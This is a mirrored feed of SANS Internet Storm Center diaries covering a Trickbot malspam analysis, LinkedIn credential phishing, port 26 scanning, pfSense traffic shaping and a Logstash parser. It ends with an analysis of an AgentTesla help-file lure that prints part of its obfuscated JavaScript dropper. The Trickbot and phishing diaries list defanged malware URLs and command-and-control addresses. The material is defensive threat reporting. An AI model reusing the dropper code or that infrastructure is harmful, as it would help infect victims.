SANS

Subscribe to SANS hírcsatorna SANS
SANS Internet Storm Center - Cooperative Cyber Security Monitor
Frissítve: 1 óra 13 perc
2021. február 19.

ISC Stormcast For Friday, February 19th, 2021 https://isc.sans.edu/podcastdetail.html?id=7380, (Fri, Feb 19th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. február 18.

ISC Stormcast For Thursday, February 18th, 2021 https://isc.sans.edu/podcastdetail.html?id=7378, (Thu, Feb 18th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. február 17.

Malspam pushing Trickbot gtag rob13, (Wed, Feb 17th)

Introduction

Trickbot malware has been a relatively constant presence in the cyber threat landscape so far this year.  We've seen activity continue this week, and today's diary reviews an infection I generated on Wednesday 2021-02-17.

The infection chain of events:

malicious spam (malspam) --> attachment (Excel spreadsheet) --> enable macros --> URL for Trickbot DLL --> post-infection activity

 

The email


Shown above:  Screenshot from an example of malspam seen earlier today (Wednesday 2021-02-17).

The spreadsheet


Shown above:  Screenshot of the attached Excel spreadsheet with macros for Trickbot.

Infection traffic


Shown above:  Traffic from an infection filtered in Wireshark.

Forensics on an infected Windows host


Shown above:  Initial Trickbot binary retrieved by the Excel macro.


Shown above:  Scheduled task for Trickbot.

In the above image (double-click on it to get a higher-resolution picture), you can see the Trickbot DLL is not where the scheduled task points to.  When I restarted the infected host, it gave me an error saying it couldn't run the task.  I've noticed this during the past several months from Trickbot infections that use a DLL file as the initial binary.  Unfortunately, I don't know why this happens.

Indicators of Compromise (IOCs)

EXAMPLES OF SUBJECT LINES AND REPLY-TO ADDRESSES:

  • Subject: DocuSign: Equipment # 1332
  • Subject: DocuSign: Equipment # 9448
  • Subject: DocuSign: Equipment # 9722
  • Subject: DocuSign: Equipment # 12169
  • Subject: DocuSign: Equipment # 23863
  • Reply-To: Lease Consultants <cloying@docusign.net>
  • Reply-To: Lease Consultants <dianoetic@docusign.net>
  • Reply-To: Lease Consultants <modicum@docusign.net>
  • Reply-To: Lease Consultants <omidyar@docusign.net>
  • Reply-To: Lease Consultants <rumery@docusign.net>
  • Note: Sending addresses may have been from email accounts that were compromised.

FILE HASHES FROM ATTACHMENTS SUBMITTED TO VIRUSTOTAL:

07d35c57585b6bd3a5e77be4e8c7d97725ad3646694d7b9cc61dbc058006450a  DocuSign_649568847_1582762946.xls
393bc60e292c3e24ab70c459ba1c595daaae68df94a75ebe571d3e75a0fe8109  DocuSign_484590053_1220881832.xls
64392b7c699791e4dddde1a1754d157c284dcc4d54e9cb8974ea661f6443ce86  DocuSign_463828509_1320623172.xls
713a539daad692c8e284718ad73c128128e8257b3c41b233d2f810717df873b7  DocuSign_2026401106_1090792446.xls
99316adbb0514f099d44bf8655486c2332eb5f3f821b80b2c0a6a85b652312e6  DocuSign_649568847_1582762946.xls
9bf4196e8fb7c4ac3be72f79f13697656145ee1cc93bb7c7a31d93ea75bbcae3  DocuSign_1264755469_604175183.xls
9fbbb8b4025b2e46429594b946d2ba74ce381e4c2968966e9a65ffd81791baa1  DocuSign_1283716068_336411873.xls
bc033032b6d2afcea2a07f4b5eb5de3137c9fc83c1302fe28a781137168884eb  DocuSign_1993467225_1309843348.xls
bc47683422d0021b2b27b551d81058213fa4d000c544b617adf1bb7b94d5f4a9  DocuSign_558551337_1625623689.xls
f391892523950617f98dd08c5e1e8ffa58f8985f7527d5ffe735944db72a312f  DocuSign_1237489607_947076939.xls

 

MALWARE FROM AN INFECTED WINDOWS HOST:

SHA256 hash: bc033032b6d2afcea2a07f4b5eb5de3137c9fc83c1302fe28a781137168884eb

  • File size: 168,960 bytes
  • File name: DocuSign_1993467225_1309843348.xls
  • File description: Excel spreadsheet with macros for Trickbot gtag rob13

SHA256 hash: e1b67bd8b15bcd422fcbc74fa3b691c40c527ffedc951a6bb8e67ca257240d16

  • File size: 698,880 bytes
  • File location: hxxps://destinostumundo[.]com/layout/recruter.php
  • File location: C:\Users\[username]\HGrt.foste
  • File description: Initial Trickbot gtag rob13 binary (DLL file)
  • Run method: rundll32.exe [file name],DllRegisterServer1

SHA256 hash: 24bd33f4ba457d77d796620a2cd4b7a3e38d63e2286fec752d898ab7c5204e4b

  • File size: 864,256 bytes
  • File location: hxxp://195.123.208[.]170/images/control.png
  • File description: Follow-up Trickbot EXE file, gtag tot43

SHA256 hash: f0391039f888fb30566295365420868ac8539075e25a690ac4400a8bb91eb803

  • File size: 864,256 bytes
  • File location: hxxp://195.123.208[.]170/images/scroll.png
  • File description: Follow-up Trickbot EXE file, gtag lib43

TRAFFIC TO RETRIEVE THE INITIAL TRICKBOT BINARY (A DLL FILE):

  • 98.142.109[.]186 port 80 - destinostumundo[.]com - GET /layout/recruter.php
  • 98.142.109[.]186 port 443 (HTTPS) - destinostumundo[.]com - GET /layout/recruter.php

POST-INFECTION TRAFFIC FOR TRICKBOT:

  • 108.170.20[.]72 port 443 - HTTPS traffic
  • 179.191.108[.]58 port 449 - HTTPS traffic
  • port 80 - checkip.amazonaws.com - GET /
  • 177.87.0[.]7 port 447 - HTTPS traffic
  • 103.102.220[.]50 port 443 - 103.102.220[.]50:443 - POST /rob13/[string with host and infection info]/81/
  • 36.95.27[.]243 port 443 - 36.95.27[.]243:443 - POST /rob13/[string with host and infection info]/81/
  • 103.102.220[.]50 port 443 - 103.102.220[.]50:443 - POST /rob13/[string with host and infection info]/83/
  • 36.95.27[.]243 port 443 - 36.95.27[.]243:443 - POST /rob13/[string with host and infection info]/90

TRAFFIC CAUSED BY TRICKBOT'S PROPAGATION MODULES TO RETRIEVE ADDITIONAL TRICKBOT BINARIES (RETURNED EXE FILES):

  • 195.123.208[.]170 port 80 - 195.123.208[.]170 - GET /images/control.png
  • 195.123.208[.]170 port 80 - 195.123.208[.]170 - GET /images/scroll.png

ATTEMPTED TCP CONNECTIONS CAUSED BY THE INFECTED WINDOWS HOST:

  • 45.14.226[.]115 port 443
  • 169.239.45[.]42 port 449
  • 92.242.214[.]203 port 449
  • 94.158.245[.]54 port 443
  • 38.132.99[.]174 port 80

Final words

A pcap of the infection traffic and the associated malware can be found here.

---
Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. február 17.

The new "LinkedInSecureMessage" &#x3f;, (Wed, Feb 17th)

[This is a guest diary by JB Bowers - @cherokeejb_]

With all the talk of secure messenger applications lately, I bet you’d like to have just one more, right?  In the past few weeks, we’ve noticed a new variant on a typical cred-stealer, in this case offering itself up as a new, secure messaging format used over the career website LinkedIn.   

There’s only one problem with this… there is no such thing as a “LinkedIn Private Shared Document”.

Not Quite Secure

Victims will receive an ordinary message, likely from someone which they already are connected with.  These are not from the more recent, unsolicited “InMail” feature, but a regular, internal “Message” on LinkedIn. There is nothing interesting about the message, although it contains a 3rd-party link, claiming to be a “LinkedInSecureMessage” which serves up the nice-looking pdf file shown above.  

If you click “VIEW DOCUMENT,” it opens up a convincing LinkedIn login page.  The example below was originally hosted at dev-jeniferng153(.)pantheonsite(.)io [1]:

This page comes complete with links directing you back to the real LinkedIn.com site, and as well as a cookie called “test,” which is backdated to 1969.

A bit deeper

I wanted to look at a selection of these domains, so I used Urlquery to find similar domains, and as well, used VirusTotal to search for similar 2nd-stage documents.  A common theme here is the use of websites that may also have legitimate work purposes, for example, appspot, firebase, and pantenonsite.  The sites use major ASNs including Fastly, Google, and Microsoft, making basic network traffic analysis for the end-user also not so useful.

Here are a few example domains:

dev-jeniferng153.pantheonsite(.)io fluted-house-283121.uc.r.appspot(.)com dev-cloudvpds100.pantheonsite(.)io earnest-sandbox-295108.ey.r.appspot.com

As you can see after reviewing dozens of these domains, blocking the domains, or even some type of regular expression based on known URLs is not going to get very far.  If you’re not able to block these sites or their corresponding IP addresses altogether, to prevent attacks like this you’ll need to focus on the human element, and of course enforcing good security practices, like avoiding password reuse across websites.

I found several similar samples on Virus Total, for example sha1 f5884fd520f302654ab0a165a74b9645a31f4379 - Japanbankdocument (1).pdf.[2]   All the files I examined used a variety of other generic or known company names, followed by the word “document,” and they had similar metadata in the pdf files. This file is currently flagged as malicious by only 1/62 vendors reporting to VirusTotal (Microsoft alone flags it as a malicious, phishing document).

A 2nd document sampled, currently scores a 0 on VT, with just the very last part of the file name, “document.pdf.”. I used Didier’s Pdf Analysis tools pdfid and pdf-parser [3] to look at samples of the documents; below are the highlights:

PDFiD 0.2.7 PDF Header: %PDF-1.7 obj 50 endobj 50 stream 6 endstream 6... xref 1 trailer 1 startxref 1 /Page 1... /XFA 0 /URI 2 ← Here we can see there is a URI present. /Colors > 2^24 0 >> obj 50 0 ← Using pdf-parser we find the next-stage phishing link in pdf object 50 Type: Referencing: << /Flags 0 /S /URI /URI (hxxps://dev-jeniferng153.pantheonsite(.)io/document(.)zip) >>

The real danger here is when the campaign targets high-value targets, using their accounts to target more and more of their LinkedIn contacts, or pivot into stealing credentials which would create more access for the adversary, for example, a Microsoft 0365 credential-stealer, like what was shown in a similar, 0365 Phish [4]. 

Again the main advantage here for the attackers is by compromising accounts, they are provided with a way to reach out convincingly to colleagues, friends, and family of the victims.  This provides yet another way an adversary can make the most out of a hacked web server, by hosting countless domains like these, for phishing.

The Human Element

If you see any more LinkedIn messages like this, of course, you’ll want to let that person know out of band that their account has been compromised and that they should update their LinkedIn password, as well as report the abuse to LinkedIn. They’ll need to let all their LinkedIn contacts know their account has been used by someone else.  If they have unfortunately used their LinkedIn password on any other sites, those passwords should also be changed as well.
While not very complicated in terms of the malware or tactics used, this is certainly the type of campaign you’ll want to watch out for, and train your colleagues to watch out for, specifically. Since the message is also based on LinkedIn, you may of course want to block, or forbid with policy, the use of social media at work altogether.  This choice may not be a good culture fit with many organizations these days, although campaigns like this provide a good reason to consider encouraging employees not to use social media or other personal websites on their work computers.
There are some other general tips for avoiding similar phishing emails on LinkedIn’s page for Identifying Phishing, and also on their page for Recognizing and Reporting Scams [5,6].

JB Bowers
@cherokeejb_

References:
[1] https://urlscan.io/result/fc3ce0f8-f327-44d0-841a-a216d5f782db/
[2] https://www.virustotal.com/gui/file/4f09b9b73008dd1e7c074f5c1b9687ce41aea29006300f4617c1a894bd8864e6/detection
[3] https://blog.didierstevens.com/programs/pdf-tools/
[4] https://www.linkedin.com/pulse/case-phishy-inmail-vasyl-gello/
[5] https://safety.linkedin.com/identifying-abuse#Browsing
[6] https://www.linkedin.com/help/linkedin/answer/56325

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. február 17.

ISC Stormcast For Wednesday, February 17th, 2021 https://isc.sans.edu/podcastdetail.html&#x3f;id=7376, (Wed, Feb 17th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. február 16.

More weirdness on TCP port 26, (Tue, Feb 16th)

A little over a year ago, I wrote a diary asking what was going on with traffic on TCP %%port:26%%. So, last week when I noticed another spike on port 26, I decided to take another look.

This time around, again based on looking at my honeypot traffic, it looks like a possible new variant of Satori. I'm still not sure why they are expecting to find telnet on port 26, but this is what I'm seeing in the honeypot.

It looks like it might be slowing down a little since the initial spike in the middle of last week, but this is still more traffic than we've seen on port 26 since the the big increase I wrote about last time. If anyone has anymore insight into this one, please let us know via our contact page, e-mail, or comment below.

---------------
Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. február 16.

ISC Stormcast For Tuesday, February 16th, 2021 https://isc.sans.edu/podcastdetail.html&#x3f;id=7374, (Tue, Feb 16th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. február 15.

Securing and Optimizing Networks: Using pfSense Traffic Shaper Limiters to Combat Bufferbloat, (Mon, Feb 15th)

[This is a guest diary by Yee Ching Tok (personal website here (https://poppopretn.com)). Feedback welcome either via comments or our contact page (https://isc.sans.edu/contact.html)]

In light of recent challenges brought about by COVID-19, the need for remote work, meetings, training, and learning has increased exponentially. A secure and optimized network would certainly allow users to do their best, despite being unable to work from their usual offices. I was recently asked if the addition of an open-sourced firewall, such as pfSense, would introduce network latency, reduce network speeds and affect productivity. A concern brought up was the issue of Bufferbloat, which is briefly defined as high latency within the network when multiple types of network traffic [for example bulk traffic (think upload/download)] hinders time-sensitive traffic (think gaming, Zoom/Skype, etc) [1]. This phenomenon is usually caused by a router lacking the ability to execute Smart Queue Management (SQM) for the network traffic. After some experiments and research, I would like to share that using pfSense’s Traffic Shaper Limiters could help optimize networks and address potential Bufferbloat issues. I also further discuss some settings that were tweaked and tested (vis-à-vis what is usually outlined) that ensure conformance to cybersecurity best practices while network performance is optimized.

Note: All networks are unique, and multiple factors can affect network performance. Processing power and availability of memory do affect the capability of a pfSense firewall, so please make sure to buy/build an appropriately sized firewall that matches the network bandwidth requirements. There are also alternative solutions that address Bufferbloat issues, such as using Ubiquiti products [2] or Untangle NG Firewall [3]. Last but not least, please remember to do a config backup on your pfSense firewall before changing anything, and test the changes made in a test network before deploying them into the production environment.

1) Assess network condition

Firstly, assess your network connection with your ISP. The website DSLReports (https://www.dslreports.com/speedtest) is suitable to start with. Start the test by selecting the appropriate connection type (E.g. Gigabit/Fiber, Cable, DSL, etc). Note down the final result, especially the grade for Bufferbloat.

2) Set up Download Limiter

Next, log in to the pfSense Web GUI, and navigate to the Limiters section. (Click on “Firewall” > “Traffic Shaper”). Following that, click on “Limiters”, and select the “New Limiter” button on the left side of the menu (Please refer to Figure 1 for the areas to select). 



Figure 1: Creating a New Limiter (Download Limiter) 

Input the following configurations (Please refer to Figure 2 for a screenshot of the configuration) for the new Limiter:

Enable – Enable limiter and its children (Check this box)
Name – WANDownload (Feel free to name it otherwise, no spaces allowed)
Bandwidth – Input the bandwidth for download as subscribed from your ISP, and select the unit (Bit/s, Kbit/s, Mbit/s). Leave the “Schedule” field unmodified. (In Figure 2, I used 1000 Mbit/s. Please adjust the values here according to your ISP subscription, or at least the guaranteed speed you are aware that the ISP is giving you.))
Mask – None 
Description – WAN Download Speed (Feel free to name it otherwise, spaces allowed)
Queue Management Algorithm – CoDel
Scheduler – FQ_CODEL (Note: You can set the value of the “quantum” parameter to 300 if you want to give priority to Voice over IP (VoIP) traffic. In addition, if your pfSense firewall is not constrained by memory, you can change the value of the “limit” parameter to 20480, and the value of “flows” parameter to 65535. Figure 2 does not show this yet, but you will be able to see these fine-grained settings after you save the limiter.)
Queue Length – 1000 (for a connection with higher bandwidth, this value can be increased to 2000/5000/10000. Start off with 1000 first.)
ECN – Enable Explicit Congestion Notification (Check this box)

At the bottom of the page, click “Save”. Do not navigate away from the page just yet. 



Figure 2: Configuration of Download Limiter

Note: You will get the following message “The traffic shaper configuration has been changed. The changes must be applied for them to take effect.”. This message can be ignored, as the changes can be applied later in one go once the download and upload limiters and queues are configured.

3) Set up Download Limiter Queue

After clicking the “Save” button, click on the “Add new Queue” button next to it (Please refer to Figure 3 for the illustration). Note: pfSense may not direct you to the Queue configuration page even after you select the “Add new Queue” button. You will notice this if you see the input for bandwidth (this is not needed for Queue configuration). In this case, select the limiter you have just created, e.g. “WANDownload”, on the left side of the menu. Scroll down, and click on the “Add new Queue” button again. You will then be redirected to the Queue configuration page.



Figure 3: Selecting the “Add new Queue” Button after Configuring Download Limiter


Input the following configurations (Please refer to Figure 4 for a screenshot of the configuration):

Enable – Enable this queue (Check this box)
Name – WANDownloadQueue (Feel free to name it otherwise, spaces not allowed)
Mask – None 
Description – WAN Download Queue (Feel free to name it otherwise, spaces allowed)
Queue Management Algorithm – CoDel
Queue Length –  (Leave this blank)
ECN – Enable Explicit Congestion Notification (Check this box)

At the bottom of the page, click “Save”. 



Figure 4: Configuring Download Limiter Queue

4) Set up Upload Limiter

It is now time to set up the Upload Limiter. Select “New Limiter” on the left side of the menu (Please refer to Figure 5 on how things should look like now). 



Figure 5: Creating a New Limiter (Upload Limiter)

Input the following configurations (Please refer to Figure 6 for a screenshot of the configuration):

Enable – Enable limiter and its children (Check this box)
Name – WANUpload (Feel free to name it otherwise, no spaces allowed)
Bandwidth – Input the bandwidth for upload as subscribed from your ISP, and select the unit (Bit/s, Kbit/s, Mbit/s). Leave the “Schedule” field unmodified. (In Figure 6, I used 500 Mbit/s. Please adjust the values here according to your ISP subscription, or at least the guaranteed speed you are aware that the ISP is giving you.)
Mask – None 
Description – WAN Upload Speed (Feel free to name it otherwise, spaces allowed)
Queue Management Algorithm – CoDel
Scheduler – FQ_CODEL (Note: You can set the value of the “quantum” parameter to 300 if you want to give priority to Voice over IP (VoIP) traffic. In addition, if your pfSense firewall is not constrained by memory, you can change the value of the “limit” parameter to 20480, and the value of “flows” parameter to 65535. Further explanations available here [4].)
Queue Length – 1000 (for a connection with higher bandwidth, this value can be increased to 2000/5000/10000. Start off with 1000 first.)
ECN – Enable Explicit Congestion Notification (Check this box)

At the bottom of the page, click “Save”. Do not navigate away from the page just yet.



Figure 6: Configuration of Upload Limiter

5) Set up Upload Limiter Queue

After clicking the “Save” button, click on the “Add new Queue” button next to it (Please refer to Figure 3 for the illustration). Note: pfSense may not direct you to the Queue configuration page even after you select the “Add new Queue” button. You will notice this if you see the input for bandwidth (this is not needed for Queue configuration). In this case, select the limiter you have just created, e.g. “WANUpload”, on the left side of the menu. Scroll down, and click on the “Add new Queue” button again. You will then be redirected to the Queue configuration page.

Input the following configurations (Please refer to Figure 7 for a screenshot of the configuration):

Enable – Enable this queue (Check this box)
Name – WANUploadQueue (Feel free to name it otherwise, spaces not allowed)
Mask – None 
Description – WAN Upload Queue (Feel free to name it otherwise, spaces allowed)
Queue Management Algorithm – CoDel
Queue Length –  (Leave this blank)
ECN – Enable Explicit Congestion Notification (Check this box)

At the bottom of the page, click “Save”.



Figure 7: Configuring Upload Limiter Queue

It is now time to apply the changes made. Click on the “Apply Changes” button on the top of the page (Please refer to Figure 8). After applying the changes, you will see a message stating “The changes have been applied successfully.”.



Figure 8: Applying Changes Made to Traffic Shaping Limiters and Queues

6) Set up Floating Firewall Rules

Navigate to the pfSense Firewall Rules page (Click on “Firewall” > “Rules”). Following that, click on “Floating” (by default, you will be brought to the “WAN” rules page). Select the first “Add” button (With reference to Figure 9, the button highlighted by the red box and with the arrow pointing up).



Figure 9: Navigating to pfSense Floating Rules and Adding First Rule

Floating Rule #1 (Please refer to Figure 10 for a screenshot of the configuration):
•    Action: Pass
•    Quick: Tick Apply the action immediately on match.
•    Interface: WAN
•    Direction: out
•    Address Family: IPv4
•    Protocol: ICMP
•    ICMP subtypes: Traceroute
•    Source: any
•    Destination: any
•    Description: Traceroute routing workaround
•    Advanced Options: Click on “Display Advanced”.
Scroll down.
•    Gateway: Do not use Default. Select your firewall WAN gateway.

Click “Save”. You will see a message “The firewall rule configuration has been changed. The changes must be applied for them to take effect.” on the top of the GUI (with reference to Figure 11). This message can be ignored, as the changes can be applied later in one go once all the firewall rules have been configured.



Figure 10: Configuration of Floating Rule for Traceroute Routing Workaround 

This rule is required for users who experience their pfSense firewall not being able send out ICMP traceroute [5] when Traffic Shaper Limiters are used. I personally did not experience this when I tested my configuration, and thus disabled this Floating Rule.

Select the second “Add” button (With reference to Figure 11, the button highlighted by the red box and with the arrow pointing down).



Figure 11: Addition of Second Floating Rule

Floating Rule #2 (Please refer to Figure 12 for a screenshot of the configuration):
•    Action: Pass
•    Quick: Tick Apply the action immediately on match.
•    Interface: WAN
•    Direction: out
•    Address Family: IPv4
•    Protocol: ICMP
•    ICMP subtypes: Echo reply, Echo Request
•    Source: any
•    Destination: any
•    Description: Limiter drop ping traffic under load workaround (Bug #9024) 
•    Advanced Options: Click on “Display Advanced”.
Scroll down.
•    Gateway: Do not use Default. Select your firewall WAN gateway.

Click “Save”. 



Figure 12: Configuration of Floating Rule for Limiter dropping Ping Traffic Under Load

This rule is required for users who experience their pfSense firewall dropping ping traffic when it is under heavy load when Traffic Shaper Limiters are used [6]. I personally did not experience this when I tested my configuration, and thus disabled this Floating Rule. In addition, a particular note has to be taken on the “Direction” option. While it is tempting to put “any” instead of “out”, “any” will allow the pfSense firewall to respond to incoming ping requests (something which many users may not want their firewalls to do so).

Next, we have to create the floating rules that will optimize the network traffic. There are some who suggest the usage of a single “Pass” action floating rule, and with the “Direction” option configured to “out”. This is not recommended. Firstly, according to Netgate documentation, Traffic Shaping related rules should utilize the “Match” action [7]. Secondly, by using only “out” for the “Direction” option, only outgoing traffic will be optimized and incoming traffic ignored. As such, 2 floating rules (one for incoming, and one for outgoing) should be created. They are as follows:

Select the second “Add” button (With reference to Figure 11, the button highlighted by the red box and with the arrow pointing down) again.

Floating Rule #3 (Incoming Traffic) (Please refer to Figure 13 for a screenshot of the configuration):
•    Action: Match
•    Interface: WAN
•    Direction: in
•    Address Family: IPv4 (Select IPv4+IPv6 if the network has IPv6 traffic)
•    Protocol: Any
•    Source: any
•    Destination: any
•    Description: WAN Incoming Traffic Queue 
•    Advanced Options: Click on “Display Advanced”.
Scroll down.
•    Gateway: Do not use Default. Select your firewall WAN gateway.
•    In / Out pipe: WANUploadQueue / WANDownloadQueue

Click “Save”. 



Figure 13: Configuration of Floating Rule for Incoming Traffic

Select the second “Add” button (With reference to Figure 11, the button highlighted by the red box and with the arrow pointing down) for the last time.

Floating Rule #4 (Outgoing Traffic) (Please refer to Figure 14 for a screenshot of the configuration):
•    Action: Match
•    Interface: WAN
•    Direction: out
•    Address Family: IPv4 (Select IPv4+IPv6 if the network has IPv6 traffic)
•    Protocol: Any
•    Source: any
•    Destination: any
•    Description: WAN Outgoing Traffic Queue 
•    Advanced Options: Click on “Display Advanced”.
Scroll down.
•    Gateway: Do not use Default. Select your firewall WAN gateway.
•    In / Out pipe: WANDownloadQueue / WANUploadQueue

Click “Save”. 



Figure 14: Configuration of Floating Rule for Outgoing Traffic

Finally, you can go ahead to click the “Apply Changes” button at the top of the GUI to apply the created firewall rules (Please refer to Figure 15). After applying the changes, you will see a message “The changes have been applied successfully. The firewall rules are now reloading in the background. Monitor the filter reload progress.”. 



Figure 15: Applying Firewall Rules

7) Re-assess network condition

Finally, re-assess your network connection with your ISP at the DSLReports website. (https://www.dslreports.com/speedtest). Start the test by selecting the appropriate connection type (E.g. Gigabit/Fiber, Cable, DSL etc), and the grade for Bufferbloat should have improved with the implementation of Traffic Shaping Limiters and Queues. 

That is all! I hope this guide has been useful in introducing network enhancements while maintaining the security of networks, especially for pfSense users. Do note that implementing Traffic Shaping may require a bit of further tweaking (e.g. Download and Upload Limiters, especially the parameter values under the Scheduler option highlighted in Steps 2 and 4 previously) due to various factors (e.g. ISP, geolocation, business requirements, equipment, etc). However, the steps outlined above should be enough to get you started on optimizing networks (especially home networks) that are increasingly being used for work, studies and personal entertainment. 

[1] https://www.bufferbloat.net/
[2] https://help.ubnt.com/hc/en-us/articles/220716608-EdgeRouter-Advanced-queue-CLI-examples
[3] https://wiki.untangle.com/index.php/Bufferbloat 
[4] https://forum.netgate.com/post/807490 
[5] https://docs.netgate.com/pfsense/en/latest/troubleshooting/traceroute-output.html
[6] https://redmine.pfsense.org/issues/9024
[7] https://docs.netgate.com/pfsense/en/latest/firewall/floating-rules.html

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. február 15.

ISC Stormcast For Monday, February 15th, 2021 https://isc.sans.edu/podcastdetail.html&#x3f;id=7372, (Mon, Feb 15th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. február 14.

Video: tshark &#x26; Malware Analysis, (Sun, Feb 14th)

In this video, I show the commands I used in diary entry "Quickie: tshark & Malware Analysis" to analyze shellcode from a pcapng file, and I also show some basic options and feature of tshark, the command-line version of Wireshark.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. február 13.

Using Logstash to Parse IPtables Firewall Logs, (Sat, Feb 13th)

One of our reader submitted some DSL Modem Firewall logs (iptables format) and I wrote a simple logstash parser to analyze and illustrate the activity, in this case it is all scanning activity against this modem. An iptables parser exist for Filebeat[2], but for this example, I wanted to show how to create a simple logstash parser using Grok[3] to parse these logs and send them to Elastic.

The Logstash Configuration Parser

# Guy Bruneau, guybruneau@outlook.com
# Date: 13 Feb 2021
# Version: 0.1
#
# Parse to Elastic Common Schema (ECS) format
# https://www.elastic.co/guide/en/ecs/1.7/ecs-field-reference.html
#
# This custom parser is parsing iptables type firewall logs dump data

# Wed Feb 10 23:59:29 2021 kern.debug kernel: [288253.168004] Firewall WAN DROP (SRC): IN= OUT= MAC=20:b0:01:6d:51:c4:a0:f3:e4:a3:1d:ba:08:00 SRC=xxx.xxx.xxx.xxx DST=xx.xxx.xx.xx LEN=40 TOS=0x00 PREC=0x00 TTL=245 ID=6607 PROTO=TCP SPT=55035 DPT=6981 WINDOW=1024 RES=0x00 SYN URGP=0 MARK=0x8000000

# Grab the logs file from filebeat which match the pattern /home/guy/logs

filter {
  if [log][file][path] =~ "logs" {
    grok {
      match => { "message" => "^%{HTTPDERROR_DATE:timestamp}.*?%{LOGLEVEL:loglevel}\s+%{WORD:event.provider}:.*Firewall\s+%{WORD:interface.name}\s+%{WORD:event.action}\s+\(%{WORD:network.direction}\).*SRC=%{IP:source.ip}\s+DST=%{IP:destination.ip}\s+.*ID=%{WORD:event.id}\s+PROTO=%{WORD:network.transport}\s+SPT=%{INT:source.port}\s+DPT=%{INT:destionation.port}.*" }
    }
  }
}

# Format: Thu Feb 11 08:46:32 2021
# https://docs.oracle.com/javase/7/docs/api/java/text/SimpleDateFormat.html

filter {
  date {
    match => ["timestamp", "EEE MMM dd HH:mm:ss yyyy"]
    target => "@timestamp"
  }
}

# Add GeoIP information to destination hostname

filter {
  if [log][file][path] =~ "logs" {
    geoip { source => "source.ip" }
  }
}

Now that the data is in Elasticsearch, I can create various reports based on the activity logged by iptables. The dashboards I prepared shows the number of records, the Top 10 targeted ports (services) and a table with the Top 10 sources with its location (GeoIP), action taken by the firewall and a total.

It is always a good idea to monitor and review the activity logged by the modem. If you aren't sure what to look for, we have tips published here as well as how you can participate and submit your logs to DShield, the service is open and free.

[1] https://www.elastic.co/downloads/logstash
[2] https://www.elastic.co/guide/en/beats/filebeat/7.11/filebeat-module-iptables.html
[3] https://grokdebug.herokuapp.com/
[4] https://isc.sans.edu/howto.html
[5] https://isc.sans.edu/forums/diary/Secure+Communication+using+TLS+in+Elasticsearch/26902/

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. február 13.

vSphere Replication updates address a command injection vulnerability (CVE-2021-21976) - https://www.vmware.com/security/advisories/VMSA-2021-0001.html, (Sat, Feb 13th)

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. február 12.

AgentTesla Dropped Through Automatic Click in Microsoft Help File, (Fri, Feb 12th)

Attackers have plenty of resources to infect our systems. If some files may look suspicious because the extension is less common (like .xsl files[1]), others look really safe and make the victim confident to open it. I spotted a phishing campaign that delivers a fake invoice. The attached file is a classic ZIP archive but it contains a .chm file: a Microsoft compiled HTML Help file[2]. The file is named "INV00620224400.chm" (sha256:af9fe480abc56cf1e1354eb243ec9f5bee9cac0d75df38249d1c64236132ceab) and has a current VT score of 27/59[3].If you open this file, you will get a normal help file (.chm extension is handled by the c:\windows\hh.exe tool).

But you will see that a Powershell window is popping up for a few seconds and disappears. Let's have a look at the file. You can handle .chm files with 7Zip and browse their content:

The sub-directories starting with "$" and the files starting with "#" are standard files in such files but let's have a look at the file called "sdf48df.htm". As usual, Microsoft provides tools and file formats that are able to work with dynamic content. This is true for help files that can embed Javascript code. Here is the content of the .htm file:

<script language="javascript"> var kldfdf='|!3C|!68|!74|!6D|!6C|!3E|!0A|!3C|!74|!69|!74|!6C|!65|!3E|!20|!43|!75|!73|!74|!6F|!6D|!65|!72|!20| !73|!65|!72|!76|!69|!63|!65|!20|!3C|!2F|!74|!69|!74|!6C|!65|!3E|!0A|!3C|!68|!65|!61|!64|!3E|!0A|!3C|!2F|!68|!65| !61|!64|!3E|!0A|!3C|!62|!6F|!64|!79|!3E|!0A|!0A|!3C|!68|!32|!20|!61|!6C|!69|!67|!6E|!3D|!63|!65|!6E|!74|!65|!6F| [...code removed...] !72|!45|!61|!63|!68|!2D|!4F|!62|!6A|!65|!63|!74|!20|!7B|!28|!20|!5B|!43|!6F|!6E|!76|!65|!72|!74|!5D|!3A|!3A|!54|!6F|!49|!6E|!74|!31|!36|!28|!28|!5B|!53|!74|!72|!69|!6E|!67|!5D|!24|!5F|!20|!29|!2C|!20|!38|!29|!20|!2D|!41|!73|!5B|!43|!68|!61|!72|!5D|!29|!7D|!29|!29|!22|!3E|!0A|!0A|!0A|!3C|!2F|!4F|!42|!4A|!45|!43|!54|!3E|!0A|!0A|!3C|!53|!43|!52|!49|!50|!54|!3E|!0A|!73|!68|!6F|!72|!74|!63|!75|!74|!2E|!43|!6C|!69|!63|!6B|!28|!29|!3B|!0A|!3C|!2F|!53|!43|!52|!49|!50|!54|!3E|!0A|!0A'; var fkodflg =bb0df4(kldfdf) document.write(unescape(fkodflg)); function bb0df4(str) { return str.split("|!").join("%"); } </script>

